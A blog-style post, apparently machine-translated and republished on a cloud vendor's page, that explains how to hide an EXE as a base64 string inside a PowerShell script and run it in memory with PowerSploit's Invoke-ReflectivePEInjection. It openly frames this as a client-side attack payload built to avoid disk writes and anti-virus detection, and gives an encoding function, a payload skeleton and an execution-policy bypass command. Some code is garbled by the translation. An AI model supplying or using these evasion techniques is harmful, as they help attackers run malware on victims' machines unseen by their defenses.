I'm trying to solve a problem where only the pure PowerShell script is used as the attack load in a client-side attack. Using PowerShell to run malicious code has many advantages, including:
1. There is no need to install anything else on the target.
2. Powerful engine (for example, you can call. NET code directly).
3. You can use the Base64 encoding command to confuse malicious commands so that malicious commands are not easily discoverable. This is also a way to avoid the use of special characters, especially in a high-level attack involving multiple steps that need to separate different attack loads.
4. You can use Invoke-expression to interpret a string as a Powershell command. From the point of penetration testing, this avoids writing complex scripts on the target disk. For example: You can use Powershell to download additional complex scripts and then interpret and execute the scripts downloaded into memory by calling Invoke-expression. This process can also avoid anti-virus software Avira.
We want to run some fairly complex features on the target, which are often part of the EXE file. I don't want to put a binary file directly on the target because it might trigger an anti-virus mechanism. So I want to put it in a PowerShell script, but I don't want to rewrite the entire PowerShell script.
Finally I think of a way.
Embed a binary file in a Powershell script and run it directly from the script without writing it to disk.
The following steps demonstrate the workaround:
1. base64 encoding of binary files
You can use the following functions:
function Convert-binarytostring {
[Cmdletbinding ()] param (
[String] $FilePath
)
try {
$ByteArray = [System.io.file]::readallbytes ($FilePath);
}
catch {
Throw "Failed to read file. Ensure that you had permission to the file, and that the file path is correct. ";
}
if ($ByteArray) {
$Base 64String = [System.convert]::tobase64string ($ByteArray);
}
else {
Throw ' $ByteArray is $null. ';
}
Write-output-inputobject $Base 64String;
}
2. Create a new script by following the procedure below
1. Use the previous method to convert the EXE file to a string;
2. Prepare Invoke-reflectivepeinjection (part of Powersploit project);
3. Convert the string to a byte array;
4. Call Invoke-reflectivepeinjection.
So, a binary file is just a string in a Powershell script that, after decoding a string into a binary array, can call Invoke-reflectivepeinjection to run directly in memory.
At last it looks like this:
# base64 encoded binary files
$InputString = "....."
function invoke-reflectivepeinjection
{
......
......
......
}
# Converting a binary string into a byte array
$PEBytes = [System.convert]::frombase64string ($InputString)
# Run EXE in memory
Invoke-reflectivepeinjection-pebytes $PEBytes-exeargs "Arg1 Arg2 Arg3 Arg4"
You can now run the script on the target:
Powershell-executionpolicy Bypass-file Payload.ps1
Depending on the embedded binary file, the following error may occur:
PE platform doesn ' t match the architecture of the process it is being loaded in (32/64bit)
To solve this problem, you only need to run 32-bit PowerShell.
Here's an example of how I embed Plink.exe into PAYLOAD.PS1:
Technology sharing: How to embed an EXE file in a PowerShell script
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
